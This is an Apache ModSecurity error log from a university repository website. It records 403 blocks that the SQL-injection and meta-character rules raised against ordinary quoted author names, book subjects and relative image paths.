[Mon Aug 28 17:34:03.088265 2023] [:error] [pid 48820] [client 47.128.16.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ringle, Christian M.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx4G8Co-f0AAL60DNEAAAAJ"]
[Mon Aug 28 17:41:45.889080 2023] [:error] [pid 48963] [client 47.128.31.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Boardman, Rosy\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx56cCo-f0AAL9DaWwAAAAM"]
[Mon Aug 28 17:48:42.871297 2023] [:error] [pid 49061] [client 47.128.25.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Bratianu, Constantin\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx7isCo-f0AAL@ldfgAAAAS"]
[Mon Aug 28 17:52:54.901025 2023] [:error] [pid 49020] [client 47.128.21.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KONSTITUSIONALISME INDONESIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx8hsCo-f0AAL98gA8AAAAE"]
[Mon Aug 28 17:53:42.873055 2023] [:error] [pid 49078] [client 47.128.18.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Lagani\\xc3\\xa8re, Robert\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx8tsCo-f0AAL@2vq4AAAAL"]
[Mon Aug 28 17:55:06.292555 2023] [:error] [pid 49122] [client 47.128.30.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Colledanchise, Michele\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx9CsCo-f0AAL-innwAAAAQ"]
[Mon Aug 28 17:56:15.490662 2023] [:error] [pid 49121] [client 47.128.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Schniederjans, Ashlyn M\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx9T8Co-f0AAL-h1loAAAAP"]
[Mon Aug 28 18:11:05.861265 2023] [:error] [pid 49376] [client 140.213.22.243] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/1._COVER_Umi_Nurhasanah_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyAycCo-f0AAMDg1MIAAAAR"]
[Mon Aug 28 18:13:20.012094 2023] [:error] [pid 49378] [client 47.128.26.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22NATASHA RASTIE AULIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyBUMCo-f0AAMDihegAAAAB"]
[Mon Aug 28 18:13:52.355207 2023] [:error] [pid 49258] [client 47.128.20.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Subrahmanian, Eswaran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyBcMCo-f0AAMBqw8IAAAAH"]
[Mon Aug 28 18:14:47.268982 2023] [:error] [pid 49262] [client 47.128.22.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Microsoft_Access_2013.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyBp8Co-f0AAMBuGMUAAAAN"]
[Mon Aug 28 18:19:27.207208 2023] [:error] [pid 49436] [client 47.128.29.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Adomi, Esharenana E.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyCv8Co-f0AAMEcMkEAAAAB"]
[Mon Aug 28 18:21:50.067964 2023] [:error] [pid 49491] [client 47.128.16.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Good_to_Great__Why_Some_Companies_Make_the_Leap...And_Others_Don't_(_PDFDrive_)_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyDTsCo-f0AAMFTdmkAAAAK"]
[Mon Aug 28 18:24:04.460152 2023] [:error] [pid 49488] [client 47.128.29.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Thinking_Skills._Critical_Thinking_and_Problem_Solving_(_PDFDrive_)_page-0001_(1).jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyD1MCo-f0AAMFQ8AgAAAAA"]
[Mon Aug 28 18:26:09.956805 2023] [:error] [pid 49490] [client 47.128.29.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Tony_Buzan-Use_Your_Memory_-_Mega_Brain_Mind_Memory_(_PDFDrive_)_page-0001_(1).jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyEUcCo-f0AAMFSEIQAAAAD"]
[Mon Aug 28 18:33:44.790178 2023] [:error] [pid 49495] [client 47.128.31.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22THE DEVELOPMENT OF THE MALTESE INSURANCE INDUSTRY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyGGMCo-f0AAMFX1xwAAAAP"]
[Mon Aug 28 18:48:04.875586 2023] [:error] [pid 49907] [client 47.128.16.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MIND, WORK, POWER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyJdMCo-f0AAMLzFQgAAAAC"]
[Mon Aug 28 18:48:22.616239 2023] [:error] [pid 49881] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Surat Pengantar Usul LLDIKTI (1).pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOyJhsCo-f0AAMLZy1YAAAAE"]
[Mon Aug 28 18:54:24.456991 2023] [:error] [pid 50022] [client 47.128.30.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ROBBINS, MEL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyK8MCo-f0AAMNm7gIAAAAG"]
[Mon Aug 28 19:23:07.830471 2023] [:error] [pid 50598] [client 47.128.21.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Penerbitan Warkah, Pemberantasan Tindak Pidana Kor\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyRq8Co-f0AAMWm1J4AAAAO"]
[Mon Aug 28 19:28:43.672047 2023] [:error] [pid 50734] [client 47.128.25.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ORGANIZATIONAL BEHAVIOR MANAGEMENT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyS@8Co-f0AAMYuLZEAAAAP"]
[Mon Aug 28 19:29:58.994745 2023] [:error] [pid 50732] [client 47.128.23.248] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Day Trading\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyTRsCo-f0AAMYsMOEAAAAM"]
[Mon Aug 28 19:44:04.671556 2023] [:error] [pid 50984] [client 47.128.21.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Krantz, Matt\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyWlMCo-f0AAMcooqEAAAAS"]
[Mon Aug 28 19:45:58.017722 2023] [:error] [pid 50978] [client 47.128.25.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22GRAHAM, BENJAMIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyXBsCo-f0AAMciLHsAAAAO"]
[Mon Aug 28 19:48:27.868682 2023] [:error] [pid 51064] [client 52.167.144.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pengembalian Atas Aset, Harga Saham\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyXm8Co-f0AAMd4B-IAAAAX"]
[Mon Aug 28 19:49:20.051430 2023] [:error] [pid 51049] [client 47.128.31.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LEADING AND MANAGING CHANGE IN THE AGE OF DISRUPTI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyX0MCo-f0AAMdp@K0AAAAJ"]
[Mon Aug 28 19:52:17.014959 2023] [:error] [pid 50993] [client 47.128.21.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_TEGUH_IMAN_DUHA.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyYgcCo-f0AAMcxc58AAAAC"]
[Mon Aug 28 19:57:41.380850 2023] [:error] [pid 51237] [client 47.128.23.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Project_management.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyZxcCo-f0AAMglSWUAAAAF"]
[Mon Aug 28 20:02:22.621813 2023] [:error] [pid 51300] [client 47.128.20.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Assurance Service\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOya3sCo-f0AAMhkCLUAAAAO"]
[Mon Aug 28 20:12:57.388296 2023] [:error] [pid 51507] [client 52.167.144.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22HUKUM KONSTITUSI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOydWcCo-f0AAMkzQ7EAAAAL"]
